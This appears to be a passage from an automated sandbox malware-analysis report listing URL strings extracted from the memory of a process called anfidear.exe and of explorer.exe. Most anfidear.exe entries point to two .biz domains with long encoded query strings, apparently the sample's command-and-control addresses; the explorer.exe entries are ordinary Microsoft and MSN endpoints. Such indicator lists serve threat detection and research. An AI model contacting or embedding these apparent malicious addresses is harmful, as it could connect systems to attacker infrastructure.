Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02F8C01947F8C01947CAC03547F8C03B1BEC24D3D5F8C02F69CAEE2075C8F03747
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02F8FED1BAF8FED1BACAFEFDBAF8FEF3E6EC1A1B28F8FEE794CAD0E888C8CEFFBA
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://unmomis.biz/d/N?02F931E4A6F931E4A6CB31C8A6F931C6FAEDD52E34F931D288CB1FDD94C901CAA6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02034E0282034E0282314E2E82034E20DE17AAC810034E34AC31603BB0337E2C82
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0206E4282306E4282334E4042306E40A7F1200E2B106E41E0D34CA111136D40623
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02087B1B75087B1B753A7B3775087B39291C9FD1E7087B2D5B3A552247384B3575
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0208E0CC2308E0CC233AE0E02308E0EE7F1C0406B108E0FA0D3ACEF51138D0E223
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?020AA6280F0AA6280F38A6040F0AA60A531E42E29D0AA61E213888113D3A96060F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?020C6411C80C6411C83E643DC80C6433941880DB5A0C6427E63E4A28FA3C543FC8
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?020F3666CC0F3666CC3D364ACC0F3644901BD2AC5E0F3650E23D185FFE3F0648CC
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?020F789C9C0F789C9C3D78B09C0F78BEC01B9C560E0F78AAB23D56A5AE3F48B29C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?020F9A8A020F9A8A023D9AA6020F9AA85E1B7E40900F9ABC2C3DB4B3303FAAA402
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?020FD0EDC80FD0EDC83DD0C1C80FD0CF941B34275A0FD0DBE63DFED4FA3FE0C3C8
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?021463E02F1463E02F2663CC2F1463C27300872ABD1463D601264DD91D2453CE2F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0214ACBE3414ACBE3426AC923414AC9C68004874A614AC881A26828706249C9034
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02228A7717228A7717108A5B17228A554B366EBD85228A413910A44E2512BA5917
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?022411AAF32411AAF3161186F3241188AF30F5606124119CDD163F93C1142184F3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0226EE6A2826EE6A2814EE462826EE4874320AA0BA26EE5C0614C0531A16DE4428
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0228989BB528989BB51A98B7B52898B9E93C7C51272898AD9B1AB6A28718A8B5B5
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0228C39BB528C39BB51AC3B7B528C3B9E93C27512728C3AD9B1AEDA28718F3B5B5
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?022CF4D3322CF4D3321EF4FF322CF4F16E381019A02CF4E51C1EDAEA001CC4FD32
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?022E5122542E5122541C510E542E5100083AB5E8C62E51147A1C7F1B661E610C54
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?022EFA15E32EFA15E31CFA39E32EFA37BF3A1EDF712EFA23CD1CD42CD11ECA3BE3
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02343E1A9A343E1A9A063E369A343E38C620DAD008343E2CB4061023A8040E349A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?023489E2333489E2330689CE333489C06F206D28A13489D41D06A7DB0104B9CC33
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02357B2A20357B2A20077B0620357B087C219FE0B2357B1C0E07551312054B0420
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0235DD9B4D35DD9B4D07DDB74D35DDB911213951DF35DDAD6307F3A27F05EDB54D
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02386E18EE386E18EE0A6E34EE386E3AB22C8AD27C386E2EC00A4021DC085E36EE
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02388B343B388B343B0A8B183B388B16672C6FFEA9388B02150AA50D0908BB1A3B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0240CC510940CC510972CC7D0940CC735554289B9B40CC672772E2683B70FC7F09
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0240CCC59F40CCC59F72CCE99F40CCE7C354280F0D40CCF3B172E2FCAD70FCEB9F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?024414EAFB4414EAFB7614C6FB4414C8A750F020694414DCD5763AD3C97424C4FB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?024449ADAD4449ADAD764981AD44498FF150AD673F44499B837667949F747983AD
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0246F53AA146F53AA174F516A146F518FD5211F03346F50C8F74DB039376C514A1
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0254B08A2254B08A2266B0A62254B0A87E405440B054B0BC0C669EB3106480A422
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025A0E4F5F5A0E4F5F680E635F5A0E6D034EEA85CD5A0E79716820766D6A3E615F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025A2E0A845A2E0A84682E26845A2E28D84ECAC0165A2E3CAA680033B66A1E2484
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025A8C4B0B5A8C4B0B688C670B5A8C69574E6881995A8C7D2568A272396ABC650B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025BB1E5225BB1E52269B1C9225BB1C77E4F552FB05BB1D30C699FDC106B81CB22
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025C30053D5C30053D6E30293D5C30276148D4CFAF5C3033136E1E3C0F6C002B3D
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025DBFE07E5DBFE07E6FBFCC7E5DBFC222495B2AEC5DBFD6506F91D94C6D8FCE7E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0260CBB29260CBB29252CB9E9260CB90CE742F780060CB84BC52E58BA050FB9C92
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?026431A4996431A49956318899643186C570D56E0B643192B7561F9DAB54018A99
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02644F3816644F3816564F1416644F1A4A70ABF284644F0E3856610124547F1616
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0266765C2166765C215476702166767E7D729296B366766A0F5458651356467221
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0271C148E871C148E843C164E871C16AB46525827A71C17EC643EF71DA41F166E8
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02795EFA49795EFA494B5ED649795ED8156DBA30DB795ECC674B70C37B496ED449
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0279C68C0479C68C044BC6A00479C6AE586D22469679C6BA2A4BE8B53649F6A204
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027EBABD187EBABD184CBA91187EBA9F446A5E778A7EBA8B364C94842A4E8A9318
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028CE4BE0E8CE4BE0EBEE4920E8CE49C529800749C8CE48820BECA873CBCD4900E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028CF41BD68CF41BD6BEF437D68CF4398A9810D1448CF42DF8BEDA22E4BCC435D6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028EB38B628EB38B62BCB3A7628EB3A93E9A5741F08EB3BD4CBC9DB250BE83A562
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028F582ECA8F582ECABD5802CA8F580C969BBCE4588F5818E4BD7617F8BF6800CA
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0290F8259690F82596A2F8099690F807CA841CEF0490F813B8A2D61CA4A0C80B96
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0292A10D4092A10D40A0A1214092A12F1C8645C7D292A13B6EA08F3472A2912340
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0294F1587E94F1587EA6F1747E94F17A22801592EC94F16E50A6DF614CA4C1767E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02987A36F4987A36F4AA7A1AF4987A14A88C9EFC66987A00DAAA540FC6A84A18F4
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0298E2C40A98E2C40AAAE2E80A98E2E6568C060E9898E2F224AACCFD38A8D2EA0A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02995F705F995F705FAB5F5C5F995F52038DBBBACD995F4671AB71496DA96F5E5F
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02AA679484AA6794849867B884AA67B6D8BE835E16AA67A2AA9849ADB69A57BA84
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02ACB76E12ACB76E129EB74212ACB74C4EB853A480ACB7583C9E9957209C874012
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02B20A4AABB20A4AAB800A66ABB20A68F7A6EE8039B20A7C8580247399823A64AB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02B20D2E56B20D2E56800D0256B20D0C0AA6E9E4C4B20D187880231764823D0056
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02B2922A64B2922A6480920664B2920838A676E0F6B2921C4A80BC135682A20464
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02B2A29EC9B2A29EC980A2B2C9B2A2BC95A646545BB2A2A8E7808CA7FB8292B0C9
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02BE549BBBBE549BBB8C54B7BBBE54B9E7AAB05129BE54AD958C7AA2898E64B5BB
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02C22D9D4EC22D9D4EF02DB14EC22DBF12D6C957DCC22DAB60F003A47CF21DB34E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02C283084CC283084CF083244CC2832A10D667C2DEC2833E62F0AD317EF2B3264C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02CA51CE61CA51CE61F851E261CA51EC3DDEB504F3CA51F84FF87FF753FA61E061
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02CCF84FD9CCF84FD9FEF863D9CCF86D85D81C854BCCF879F7FED676EBFCC861D9
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02D09DF3BFD09DF3BFE29DDFBFD09DD1E3C479392DD09DC591E2B3CA8DE0ADDDBF
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02D1AD1CC6D1AD1CC6E3AD30C6D1AD3E9AC549D654D1AD2AE8E38325F4E19D32C6
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02D3148868D3148868E114A468D314AA34C7F042FAD314BE46E13AB15AE324A668
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02EC71869EEC71869EDE71AA9EEC71A4C2F8954C0CEC71B0B0DE5FBFACDC41A89E
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02ECA9A87AECA9A87ADEA9847AECA98A26F84D62E8ECA99E54DE879148DC99867A
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F01E3F00F01E3F00C21E1300F01E1D5CE4FAF592F01E092EC2300632C02E1100
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F0DEDB8CF0DEDB8CC2DEF78CF0DEF9D0E43A111EF0DEEDA2C2F0E2BEC0EEF58C
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F2BD8324F2BD8324C0BDAF24F2BDA178E65949B6F2BDB50AC093BA16C28DAD24
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F3E1611BF3E1611BC1E14D1BF3E14347E705AB89F3E15735C1CF5829C3D14F1B
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F561B7A4F561B7A4C7619BA4F56195F8E1857D36F561818AC74F8E96C55199A4
Source: anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F89C5C9AF89C5C9ACA9C709AF89C7EC6EC789608F89C6AB4CAB265A8C8AC729A
Source: explorer.exe, 00000005.00000000.2326241159.0000000008680000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000005.00000000.2329528909.000000000BF7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000005.00000000.2329528909.000000000BF7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSN
Source: explorer.exe, 00000005.00000000.2329528909.000000000BF7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSO
Source: explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000005.00000003.3076305193.0000000002FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4777515352.0000000002FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2323228826.0000000002FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=8B2A0224B153403AA00C6B7A3F8B99F4&timeOut=5000&oc
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008810000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008810000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000002.4781575407.0000000008810000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008810000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com4C
Source: explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000005.00000000.2329528909.000000000BE2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4785857776.000000000BE2A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 00000005.00000000.2329528909.000000000BE2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4785857776.000000000BE2A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: explorer.exe, 00000005.00000000.2329528909.000000000BD93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4785857776.000000000BD93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000000.2329528909.000000000BE2A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/r
Source: explorer.exe, 00000005.00000000.2329528909.000000000BE2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4785857776.000000000BE2A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/scottish-authorities-sign-extradition-order-for-us-fugitive-acc
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/mitch-mcconnell-warns-house-republicans-about-hammerlock-of-
Source: explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/pleasant-surprise-greets-scientists-opening-asteroid-sampl
